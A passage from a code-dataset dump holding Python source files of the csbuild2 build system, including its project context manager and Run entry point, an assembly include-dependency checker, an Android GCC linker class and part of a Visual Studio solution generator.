methodResolvers:\n\t\t\t\tmethodResolvers = None\n\n\t\t\tContextManager.__init__(self, tuple(contextsDict.items()), methodResolvers)\n\n\tclass Project(object):\n\t\t\"\"\"\n\t\tApply settings to a specific project. If a project does not exist with the given name, it will be created.\n\t\tIf it does exist, these settings will apply to the existing project.\n\n\t\t:param name: The project's name.\n\t\t:type name: str, bytes\n\t\t:param workingDirectory: The location on disk containing the project's files, which should be examined to collect source files.\n\t\t\tIf autoDiscoverSourceFiles is False, this parameter is ignored.\n\t\t:type workingDirectory: str, bytes\n\t\t:param depends: List of names of other prjects this one depends on.\n\t\t:type depends: list(str, bytes)\n\t\t:param priority: Priority in the build queue, used to cause this project to get built first in its dependency ordering. Higher number means higher priority.\n\t\t:type priority: bool\n\t\t:param ignoreDependencyOrdering: Treat priority as a global value and use priority to raise this project above, or lower it below, the dependency order\n\t\t:type ignoreDependencyOrdering: bool\n\t\t:param autoDiscoverSourceFiles: If False, do not automatically search the working directory for files, but instead only build files that are manually added.\n\t\t:type autoDiscoverSourceFiles: bool\n\t\t:param autoResolveRpaths: If True, automatically add RPATH arguments to linked shared libraries. Only applies to native, UNIX-based shared libraries and executables.\n\t\t:type autoResolveRpaths: bool\n\t\t\"\"\"\n\n\t\t@TypeChecked(name=String, workingDirectory=String, depends=(list,type(None)), priority=int, ignoreDependencyOrdering=bool, autoDiscoverSourceFiles=bool, autoResolveRpaths=bool)\n\t\tdef __init__(self, name, workingDirectory, depends=None, priority=0, ignoreDependencyOrdering=False, autoDiscoverSourceFiles=True, autoResolveRpaths=True):\n\t\t\tassert name != \"\", \"Project name cannot be empty.\"\n\t\t\tassert workingDirectory != \"\", \"Working directory cannot be empty (use '.' to use the makefile's local directory)\"\n\t\t\tif depends is None:\n\t\t\t\tdepends = []\n\n\t\t\tself._name = name\n\t\t\tself._workingDirectory = os.path.abspath(workingDirectory)\n\t\t\tself._depends = depends\n\t\t\tself._priority = priority\n\t\t\tself._ignoreDependencyOrdering = ignoreDependencyOrdering\n\t\t\tself._autoDiscoverSourceFiles = autoDiscoverSourceFiles\n\t\t\tself._autoResolveRpaths = autoResolveRpaths\n\t\t\tself._prevPlan = None\n\n\t\tdef __enter__(self):\n\t\t\t\"\"\"\n\t\t\tEnter project context\n\t\t\t\"\"\"\n\t\t\tself._prevPlan = csbuild.currentPlan\n\t\t\tcsbuild.currentPlan = project_plan.ProjectPlan(\n\t\t\t\tself._name,\n\t\t\t\tself._workingDirectory,\n\t\t\t\tself._depends,\n\t\t\t\tself._priority,\n\t\t\t\tself._ignoreDependencyOrdering,\n\t\t\t\tself._autoDiscoverSourceFiles,\n\t\t\t\tself._autoResolveRpaths,\n\t\t\t\tos.getcwd()\n\t\t\t)\n\t\t\tshared_globals.sortedProjects.Add(csbuild.currentPlan, self._depends)\n\n\t\tdef __exit__(self, excType, excValue, backtrace):\n\t\t\t\"\"\"\n\t\t\tLeave the project context\n\n\t\t\t:param excType: type of exception thrown in the context (ignored)\n\t\t\t:type excType: type\n\t\t\t:param excValue: value of thrown exception (ignored)\n\t\t\t:type excValue: any\n\t\t\t:param backtrace: traceback attached to the thrown exception (ignored)\n\t\t\t:type backtrace: traceback\n\t\t\t:return: Always false\n\t\t\t:rtype: bool\n\t\t\t\"\"\"\n\t\t\tcsbuild.currentPlan = self._prevPlan\n\t\t\treturn False\n\n\tdef OnBuildStarted(func):\n\t\t\"\"\"\n\t\tDecorator that registers an OnBuildStarted event hook.\n\t\t:param func: Function that accepts a single parameter with type list[csbuild._build.project.Project],\n\t\t\tcontaining all projects that will be built in this run.\n\t\t:type func: Callable\n\t\t\"\"\"\n\t\tshared_globals.buildStartedHooks.add(func)\n\n\tdef OnBuildFinished(func):\n\t\t\"\"\"\n\t\tDecorator that registers an OnBuildFinished event hook.\n\t\t:param func: function that accepts a single parameter with type list[csbuild._build.project.Project],\n\t\t\tcontaining all projects built in this run\n\t\t:type func: Callable\n\t\t\"\"\"\n\t\tshared_globals.buildFinishedHooks.add(func)\n\n\tdef Run():\n\t\t\"\"\"\n\t\tRun a build. This is called automatically if the environment variable CSBUILD_NO_AUTO_RUN is not equal to 1.\n\t\tIf the build runs automatically, it will execute the csbuild makefile as part of running.\n\t\tIf the build does not run automatically, the csbuild makefile is expected to finish executing before\n\t\tcalling this function. The default and recommended behavior is to allow csbuild to run on its own;\n\t\thowever, it can be beneficial to defer calling Run for use in environments such as tests and the\n\t\tinteractive console.\n\t\t\"\"\"\n\t\tdef _exitsig(sig, _):\n\t\t\tif sig == signal.SIGINT:\n\t\t\t\tlog.Error(\"Keyboard interrupt received. Aborting build.\")\n\t\t\telse:\n\t\t\t\tlog.Error(\"Received terminate signal. Aborting build.\")\n\t\t\tsystem.Exit(sig)\n\n\t\tsignal.signal(signal.SIGINT, _exitsig)\n\t\tsignal.signal(signal.SIGTERM, _exitsig)\n\n\t\tshared_globals.runMode = RunMode.Normal\n\n\t\ttry:\n\t\t\t#Regular sys.exit can't be called because we HAVE to re-acquire the import lock at exit.\n\t\t\t#We stored sys.exit earlier, now we overwrite it to call our wrapper.\n\t\t\tsys.exit = system.Exit\n\n\t\t\t_build.Run()\n\t\t\tshared_globals.settings.Persist()\n\t\t\tsystem.Exit(0)\n\t\texcept:\n\t\t\ttraceback.print_exc()\n\t\t\tsystem.CleanUp()\n\t\t\tsys.stdout.flush()\n\t\t\tsys.stderr.flush()\n\t\t\t# pylint: disable=protected-access\n\t\t\tos._exit(1)\n\nif os.getenv(PlatformString(\"CSBUILD_NO_AUTO_RUN\")) != \"1\":\n\tRun()\n" }, { "alpha_fraction": 0.7329045534133911, "alphanum_fraction": 0.7345971465110779, "avg_line_length": 35.92499923706055, "blob_id": "63dc55a353d87dc78f1bcf21bb1dcbc095fcf82d", "content_id": "0c0eeecb9e93bc62daaee34dafe74901498d12be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2954, "license_type": "no_license", "max_line_length": 122, "num_lines": 80, "path": "/csbuild/tools/assemblers/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: assemblers\n\t:synopsis: Built-in assembler tools\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport re\n\nfrom ... import log, perf_timer\nfrom ..._utils import shared_globals\nfrom ...toolchain import CompileChecker\n\n_includeRegex = re.compile(R'^\\s*#\\s*include\\s+\"(\\S+)\"', re.M)\n\nclass AsmCompileChecker(CompileChecker):\n\t\"\"\"\n\tCompileChecker for assembly files that knows how to get assembly file dependency lists.\n\t\"\"\"\n\tdef __init__(self, assembler):\n\t\tCompileChecker.__init__(self)\n\t\tself._assembler = assembler\n\n\tdef GetDependencies(self, buildProject, inputFile):\n\t\t\"\"\"\n\t\tGet a list of dependencies for a file.\n\n\t\t:param buildProject: Project encapsulating the files being built\n\t\t:type buildProject: csbuild._build.project.Project\n\t\t:param inputFile: The file to check\n\t\t:type inputFile: str\n\t\t:return: Set of files to depend on\n\t\t:rtype: set[str]\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"Assembly header dependency resolution\"):\n\t\t\tlog.Info(\"Checking header dependencies for {}\", inputFile)\n\n\t\t\tcache = shared_globals.settings.Get(\"asmHeaderCache\", {})\n\t\t\tmtime = os.path.getmtime(inputFile)\n\t\t\tif inputFile in cache:\n\t\t\t\tif mtime <= cache[inputFile][\"mtime\"]:\n\t\t\t\t\treturn cache[inputFile][\"result\"]\n\n\t\t\twith open(inputFile, \"rb\") as f:\n\t\t\t\tcontents = f.read()\n\t\t\t\tcontents = contents.decode(\"utf-8\", \"replace\")\n\n\t\t\tret = set()\n\n\t\t\tincludeDirs = [os.path.dirname(inputFile)] + list(buildProject.toolchain.Tool(self._assembler).GetIncludeDirectories())\n\t\t\tfor header in _includeRegex.findall(contents):\n\t\t\t\tfor includeDir in includeDirs:\n\t\t\t\t\tmaybeHeaderLoc = os.path.join(includeDir, header)\n\t\t\t\t\tif os.access(maybeHeaderLoc, os.F_OK) and not os.path.isdir(maybeHeaderLoc):\n\t\t\t\t\t\tret.add(os.path.normpath(maybeHeaderLoc))\n\t\t\tcache[inputFile] = {\"mtime\": mtime, \"result\": ret}\n\t\t\treturn ret\n" }, { "alpha_fraction": 0.6989635229110718, "alphanum_fraction": 0.6998648047447205, "avg_line_length": 32.3684196472168, "blob_id": "678fe4cadffd78391465ade12082a25f47f913a3", "content_id": "e6a934fc3429ad74acf1d2cba6f931f003b06c02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4438, "license_type": "no_license", "max_line_length": 117, "num_lines": 133, "path": "/csbuild/tools/linkers/android_gcc_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_gcc_linker\n\t:synopsis: Android gcc linker tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nimport csbuild\n\nfrom .gcc_linker import GccLinker\nfrom ..common.android_tool_base import AndroidToolBase\n\nclass AndroidGccLinker(GccLinker, AndroidToolBase):\n\t\"\"\"\n\tAndroid gcc linker implementation\n\t\"\"\"\n\tsupportedArchitectures = AndroidToolBase.supportedArchitectures\n\n\toutputFiles = {\".a\", \".so\"}\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tGccLinker.SetupForProject(self, project)\n\t\tAndroidToolBase.SetupForProject(self, project)\n\n\tdef _getOutputExtension(self, projectType):\n\t\t# Android doesn't have a native application type. Applications are linked as shared libraries.\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.Application: \".so\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".so\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\tdef _getLdName(self):\n\t\treturn self._androidInfo.ldPath\n\n\tdef _getBinaryLinkerName(self):\n\t\treturn self._androidInfo.gppPath\n\n\tdef _getArchiverName(self):\n\t\treturn self._androidInfo.arPath\n\n\tdef _getDefaultArgs(self, project):\n\t\tbaseArgs = [] if project.projectType == csbuild.ProjectType.StaticLibrary else [\"-shared\", \"-fPIC\"]\n\t\tdefaultAndroidArgs = self._getDefaultLinkerArgs()\n\t\treturn baseArgs + defaultAndroidArgs\n\n\tdef _getStdLibArgs(self):\n\t\t# Android handles this manually through library arguments.\n\t\treturn []\n\n\tdef _getLibraryPathArgs(self, project):\n\t\targs = []\n\t\tpaths = set()\n\n\t\t# Add the STL lib path first since it's technically a system path.\n\t\tif self._androidInfo.stlLibPath:\n\t\t\targs.append(\"-L{}\".format(self._androidInfo.stlLibPath))\n\n\t\t# Extract all of the library paths.\n\t\tfor lib in self._actualLibraryLocations.values():\n\t\t\tpaths.add(os.path.dirname(lib))\n\n\t\tfor libPath in sorted(paths):\n\t\t\targs.append(\"-L\\\"{}\\\"\".format(libPath))\n\n\t\treturn args\n\n\tdef _getRpathArgs(self, project):\n\t\treturn []\n\n\tdef _getLibraryArgs(self):\n\t\targs = [\"-lc\", \"-lm\", \"-lgcc\", \"-llog\", \"-landroid\"]\n\n\t\tif self._androidInfo.stlLibName:\n\t\t\text = \"_static.a\" if self._staticRuntime else \"_shared.so\"\n\t\t\targs.append(\"-l:{}\".format(\"{}{}\".format(self._androidInfo.stlLibName, ext)))\n\n\t\t# Add only the basename for each library.\n\t\tfor lib in self._actualLibraryLocations.values():\n\t\t\targs.append(\"-l:{}\".format(os.path.basename(lib)))\n\n\t\treturn args\n\n\tdef _getArchitectureArgs(self, project):\n\t\tbuildArchName = self._getBuildArchName(project.architectureName)\n\t\treturn [\"-march={}\".format(buildArchName)] if buildArchName else []\n\n\tdef _getSystemArgs(self, project):\n\t\treturn [\n\t\t\t\"--sysroot\",\n\t\t\tself._androidInfo.sysRootPath,\n\t\t\t\"-Wl,--rpath-link={}\".format(self._androidInfo.systemLibPath),\n\t\t]\n\n\tdef _getLibrarySearchDirectories(self):\n\t\treturn [self._androidInfo.systemLibPath] + list(self._libraryDirectories)\n" }, { "alpha_fraction": 0.7410473227500916, "alphanum_fraction": 0.74855637550354, "avg_line_length": 35.290836334228516, "blob_id": "557d072da21a3b345cb1dec37f837aa35b721e96", "content_id": "5e2d22e41baffaf572683588909d70c92c22b4ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45545, "license_type": "no_license", "max_line_length": 160, "num_lines": 1255, "path": "/csbuild/tools/project_generators/visual_studio/internal/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2018 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: internal\n\t:synopsis: Internal functionality for the Visual Studio solution generator.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport codecs\nimport contextlib\nimport csbuild\nimport hashlib\nimport os\nimport sys\nimport tempfile\nimport uuid\n\nfrom csbuild import log\nfrom csbuild._utils import GetCommandLineString, PlatformString\n\nfrom xml.etree import ElementTree as ET\nfrom xml.dom import minidom\n\nfrom ..platform_handlers import VsInstallInfo\nfrom ..platform_handlers.android import VsNsightTegraPlatformHandler\nfrom ..platform_handlers.ps3 import VsPs3PlatformHandler\nfrom ..platform_handlers.ps4 import VsPs4PlatformHandler\nfrom ..platform_handlers.ps5 import VsPs5PlatformHandler\nfrom ..platform_handlers.psvita import VsPsVitaPlatformHandler\nfrom ..platform_handlers.windows import VsWindowsX86PlatformHandler, VsWindowsX64PlatformHandler\n\nfrom ....assemblers.gcc_assembler import GccAssembler\nfrom ....assemblers.msvc_assembler import MsvcAssembler\n\nfrom ....cpp_compilers.cpp_compiler_base import CppCompilerBase\n\nfrom ....java_compilers.java_compiler_base import JavaCompilerBase\n\n\nclass Version(object):\n\t\"\"\"\n\tEnum values representing Visual Studio versions.\n\t\"\"\"\n\tVs2010 = \"2010\"\n\tVs2012 = \"2012\"\n\tVs2013 = \"2013\"\n\tVs2015 = \"2015\"\n\tVs2017 = \"2017\"\n\tVs2019 = \"2019\"\n\tVs2022 = \"2022\"\n\n\nFILE_FORMAT_VERSION_INFO = {\n\tVersion.Vs2010: VsInstallInfo(\"Visual Studio 2010\", \"11.00\", \"2010\", \"v100\"),\n\tVersion.Vs2012: VsInstallInfo(\"Visual Studio 2012\", \"12.00\", \"2012\", \"v110\"),\n\tVersion.Vs2013: VsInstallInfo(\"Visual Studio 2013\", \"12.00\", \"2013\", \"v120\"),\n\tVersion.Vs2015: VsInstallInfo(\"Visual Studio 2015\", \"12.00\", \"14\", \"v140\"),\n\tVersion.Vs2017: VsInstallInfo(\"Visual Studio 2017\", \"12.00\", \"15\", \"v141\"),\n\tVersion.Vs2019: VsInstallInfo(\"Visual Studio 2019\", \"12.00\", \"Version 16\", \"v142\"),\n\tVersion.Vs2022: VsInstallInfo(\"Visual Studio 2022\", \"12.00\", \"Version 17\", \"v143\"),\n}\n\nCPP_SOURCE_FILE_EXTENSIONS = CppCompilerBase.inputFiles\nCPP_HEADER_FILE_EXTENSIONS = { \".h\", \".hh\", \".hpp\", \".hxx\" }\nOBJC_SOURCE_FILE_EXTENSIONS = { \".m\", \".mm\" }\nHLSL_SOURCE_FILE_EXTENSIONS = { \".hlsl\" }\nHLSL_HEADER_FILE_EXTENSIONS = { \".hlsli\" }\nPYTHON_FILE_EXTENSIONS = { \".py\" }\nBATCH_FILE_EXTENSIONS = { \".bat\", \".cmd\" }\n\nASM_FILE_EXTENSIONS = GccAssembler.inputFiles | MsvcAssembler.inputFiles\n\nMISC_FILE_EXTENSIONS = { \".inl\", \".inc\", \".def\" } \\\n\t| JavaCompilerBase.inputGroups\n\nALL_FILE_EXTENSIONS = CPP_SOURCE_FILE_EXTENSIONS \\\n\t| CPP_HEADER_FILE_EXTENSIONS \\\n\t| OBJC_SOURCE_FILE_EXTENSIONS \\\n\t| HLSL_SOURCE_FILE_EXTENSIONS \\\n\t| HLSL_HEADER_FILE_EXTENSIONS \\\n\t| ASM_FILE_EXTENSIONS \\\n\t| PYTHON_FILE_EXTENSIONS \\\n\t| BATCH_FILE_EXTENSIONS \\\n\t| MISC_FILE_EXTENSIONS\n\n# Switch for toggling the project folders separating files by their extensions.\nENABLE_FILE_TYPE_FOLDERS = False\n\n# Global dictionary of generated UUIDs for Visual Studio projects. This is needed to make sure there are no\n# duplicates when generating new UUIDs.\nUUID_TRACKER = {}\n\n# Keep track of the registered platform handlers.\nPLATFORM_HANDLERS = {}\n\n# Collection of all valid build specs used by input project generators. This will be pruned against\n# registered platform handlers.\nBUILD_SPECS = []\n\n# Absolute path to the main makefile that invoked csbuild.\nMAKEFILE_PATH = os.path.abspath(sys.modules[\"__main__\"].__file__)\n\n# Absolute path to the \"regenerate solution\" batch file. This will be filled in when the solution generator is run.\nREGEN_FILE_PATH = \"\"\n\n_createRootXmlNode = ET.Element\n_addXmlNode = ET.SubElement\n\ndef _makeXmlCommentNode(parentXmlNode, text):\n\tcomment = ET.Comment(text)\n\tparentXmlNode.append(comment)\n\treturn comment\n\ndef _generateUuid(name):\n\tglobal UUID_TRACKER\n\n\tif not name:\n\t\treturn \"{{{}}}\".format(str(uuid.UUID(int=0)))\n\n\tname = PlatformString(name if name else \"\")\n\n\tnameIndex = 0\n\tnameToHash = name\n\n\t# Keep generating new UUIDs until we've found one that isn't already in use. This is only useful in cases\n\t# where we have a pool of objects and each one needs to be guaranteed to have a UUID that doesn't collide\n\t# with any other object in the same pool. Though, because of the way UUIDs work, having a collision should\n\t# be extremely rare anyway.\n\twhile True:\n\t\tnewUuid = uuid.uuid5( uuid.NAMESPACE_OID, nameToHash )\n\t\tmappedName = UUID_TRACKER.get(newUuid, None)\n\n\t\tif not mappedName or mappedName == nameToHash:\n\t\t\tif not mappedName:\n\t\t\t\tUUID_TRACKER.update({ newUuid: name })\n\n\t\t\treturn \"{{{}}}\".format(str(newUuid)).upper()\n\n\t\t# Name collision! The easy solution here is to slightly modify the name in a predictable way.\n\t\tnameToHash = \"{}{}\".format( name, nameIndex )\n\t\tnameIndex += 1\n\n\ndef _getVsConfigName(buildSpec):\n\t# Visual Studio can be exceptionally picky about configuration names. For instance, if your build script\n\t# has the \"debug\" target, you may run into problems with Visual Studio showing that alongside it's own\n\t# \"Debug\" configuration, which it may have decided to silently add alongside your own. The solution is to\n\t# just put the configurations in a format it expects (first letter upper case). That way, it will see \"Debug\"\n\t# already there and won't try to silently 'fix' that up for you.\n\treturn buildSpec[2].capitalize()\n\n\ndef _createBuildSpec(generator):\n\treturn generator.projectData.toolchainName \\\n\t\t, generator.projectData.architectureName \\\n\t\t, generator.projectData.targetName\n\n\ndef _createVsPlatform(buildSpec, platformHandler):\n\treturn \"{}|{}\".format(_getVsConfigName(buildSpec), platformHandler.GetVisualStudioPlatformName())\n\n\ndef _constructRelPath(filePath, rootPath):\n\ttry:\n\t\t# Attempt to construct the relative path from the root.\n\t\tnewPath = os.path.relpath(filePath, rootPath)\n\n\texcept:\n\t\t# If that fails, return the input path as-is.\n\t\tnewPath = filePath\n\n\treturn newPath\n\n\ndef _getItemRootFolderName(filePath):\n\tfileExt = os.path.splitext(filePath)[1]\n\tif fileExt in CPP_SOURCE_FILE_EXTENSIONS:\n\t\treturn \"C/C++ source files\"\n\tif fileExt in CPP_HEADER_FILE_EXTENSIONS:\n\t\treturn \"C/C++ header files\"\n\tif fileExt in ASM_FILE_EXTENSIONS:\n\t\treturn \"Assembly source files\"\n\tif fileExt in HLSL_SOURCE_FILE_EXTENSIONS:\n\t\treturn \"Shader source files\"\n\tif fileExt in HLSL_HEADER_FILE_EXTENSIONS:\n\t\treturn \"Shader header files\"\n\tif fileExt in PYTHON_FILE_EXTENSIONS:\n\t\treturn \"Python source files\"\n\tif fileExt in BATCH_FILE_EXTENSIONS:\n\t\treturn \"Batch source files\"\n\tif not fileExt:\n\t\treturn \"Unknown files\"\n\n\treturn \"{} files\".format(fileExt)\n\n\ndef _getSourceFileProjectStructure(projWorkingPath, projExtraPaths, filePath, separateFileExtensions):\n\tprojStructure = []\n\n\t# The first item should be the file name directory if separating by file extension.\n\tif separateFileExtensions:\n\t\tfolderName = _getItemRootFolderName(filePath)\n\n\t\tprojStructure.append(folderName)\n\n\trelativePath = None\n\n\ttempPath = _constructRelPath(filePath, projWorkingPath)\n\n\tif tempPath != filePath:\n\t\t# The input file path is under the project's working directory.\n\t\trelativePath = tempPath\n\n\telse:\n\t\t# The input file path is outside the project's working directory.\n\t\tprojStructure.append(\"[External]\")\n\n\t\t# Search each extra source directory in the project to see if the input file path is under one of them.\n\t\tfor extraPath in projExtraPaths:\n\t\t\ttempPath = _constructRelPath(filePath, extraPath)\n\n\t\t\tif tempPath != filePath:\n\t\t\t\t# Found the extra source directory that contains the input file path.\n\t\t\t\trelativePath = tempPath\n\t\t\t\trootPath = filePath[:-(len(relativePath) + 1)]\n\t\t\t\tbaseFolderName = os.path.basename(rootPath)\n\n\t\t\t\t# For better organization, add the input file to a special directory that hopefully identifies it.\n\t\t\t\tprojStructure.append(baseFolderName)\n\t\t\t\tbreak\n\n\tif not relativePath:\n\t\t# The input file was not found under any source directory, so it'll just be added by itself.\n\t\tprojStructure.append(os.path.basename(filePath))\n\n\telse:\n\t\t# Take the relative path and split it into segments to form the remaining directories for the project structure.\n\t\trelativePath = relativePath.replace(\"\\\\\", \"/\")\n\t\tpathSegments = relativePath.split(\"/\")\n\n\t\tprojStructure.extend(pathSegments)\n\n\treturn projStructure\n\n\nclass VsProjectType(object):\n\t\"\"\"\n\tEnum describing project types.\n\t\"\"\"\n\tRoot = \"root\"\n\tStandard = \"standard\"\n\tFilter = \"filter\"\n\n\nclass VsProjectSubType(object):\n\t\"\"\"\n\tEnum describing project sub-types.\n\t\"\"\"\n\tNormal = \"normal\"\n\tBuildAll = \"build_all\"\n\tRegen = \"regen\"\n\n\nclass VsProjectItemType(object):\n\t\"\"\"\n\tEnum describing project item types.\n\t\"\"\"\n\tFile = \"file\"\n\tFolder = \"folder\"\n\n\nclass VsProjectItem(object):\n\t\"\"\"\n\tContainer for items owned by Visual Studio projects.\n\t\"\"\"\n\tdef __init__(self, name, dirPath, itemType, parentSegments):\n\t\tglobal CPP_SOURCE_FILE_EXTENSIONS\n\t\tglobal CPP_HEADER_FILE_EXTENSIONS\n\n\t\tself.name = name if name else \"\"\n\t\tself.dirPath = dirPath if dirPath else \"\"\n\t\tself.guid = _generateUuid(os.path.join(self.dirPath, self.name))\n\t\tself.itemType = itemType\n\t\tself.supportedBuildSpecs = set()\n\t\tself.children = {}\n\t\tself.parentSegments = parentSegments if parentSegments else []\n\t\tself.tag = None\n\n\t\tif self.itemType == VsProjectItemType.File:\n\t\t\tfileExt = os.path.splitext(self.name)[1]\n\t\t\tif fileExt in CPP_SOURCE_FILE_EXTENSIONS:\n\t\t\t\tself.tag = \"ClCompile\"\n\t\t\telif fileExt in CPP_HEADER_FILE_EXTENSIONS:\n\t\t\t\tself.tag = \"ClInclude\"\n\t\t\telif fileExt in HLSL_SOURCE_FILE_EXTENSIONS:\n\t\t\t\tself.tag = \"FxCompile\"\n\t\t\telse:\n\t\t\t\tself.tag = \"None\"\n\n\tdef GetSegmentPath(self):\n\t\t\"\"\"\n\t\tGet the item parent segments as a path string.\n\n\t\t:return: Parent segment path string.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn os.sep.join(self.parentSegments)\n\n\nclass VsProject(object):\n\t\"\"\"\n\tContainer for project-level data in Visual Studio.\n\t\"\"\"\n\tdef __init__(self, name, relFilePath, projType):\n\t\tmakeFileName = os.path.basename(MAKEFILE_PATH)\n\t\tmakeFileItem = VsProjectItem(makeFileName, os.path.dirname(MAKEFILE_PATH), VsProjectItemType.File, [])\n\t\tmakeFileItem.supportedBuildSpecs = set(BUILD_SPECS)\n\n\t\tself.name = name\n\t\tself.relFilePath = relFilePath\n\t\tself.projType = projType\n\t\tself.subType = VsProjectSubType.Normal\n\t\tself.guid = _generateUuid(name)\n\t\tself.children = {}\n\t\tself.items = { makeFileItem.name: makeFileItem }\n\t\tself.supportedBuildSpecs = set()\n\t\tself.platformGenerator = {}\n\t\tself.platformOutputType = {}\n\t\tself.platformOutputName = {}\n\t\tself.platformOutputDirPath = {}\n\t\tself.platformIntermediateDirPath = {}\n\t\tself.platformIncludePaths = {}\n\t\tself.platformDefines = {}\n\t\tself.platformCxxLanguageStandard = {}\n\n\t\tself.slnTypeGuid = {\n\t\t\tVsProjectType.Standard: \"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\",\n\t\t\tVsProjectType.Filter: \"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\",\n\t\t}.get(self.projType, \"{UNKNOWN}\")\n\n\tdef GetVcxProjFilePath(self, extraExtension=\"\"):\n\t\t\"\"\"\n\t\tGet the relative file path to this project's vcxproj file.\n\n\t\t:param extraExtension: Extra part to add onto the file extension (allows us to construct \".vcxproj.filters\" and \".vcxproj.user\" files.\n\t\t:type extraExtension: str\n\n\t\t:return: Relative vcxproj file path.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn os.path.join(\"vsproj\", self.relFilePath, \"{}.vcxproj{}\".format(self.name, extraExtension))\n\n\tdef MergeProjectData(self, buildSpec, generator):\n\t\t\"\"\"\n\t\tMerge data for a given build spec and generator into the project.\n\n\t\t:param buildSpec: Build spec matching the input generator.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param generator: Generator containing the data that needs to be merged into the project.\n\t\t:type generator: csbuild.tools.project_generators.visual_studio.VsProjectGenerator or None\n\t\t\"\"\"\n\t\tglobal ENABLE_FILE_TYPE_FOLDERS\n\n\t\tif self.projType == VsProjectType.Standard:\n\n\t\t\t# Register support for the input build spec.\n\t\t\tif buildSpec not in self.supportedBuildSpecs:\n\t\t\t\tself.supportedBuildSpecs.add(buildSpec)\n\t\t\t\tself.platformOutputType.update({ buildSpec: csbuild.ProjectType.Application })\n\t\t\t\tself.platformOutputName.update({ buildSpec: \"\" })\n\t\t\t\tself.platformOutputDirPath.update({ buildSpec: \"\" 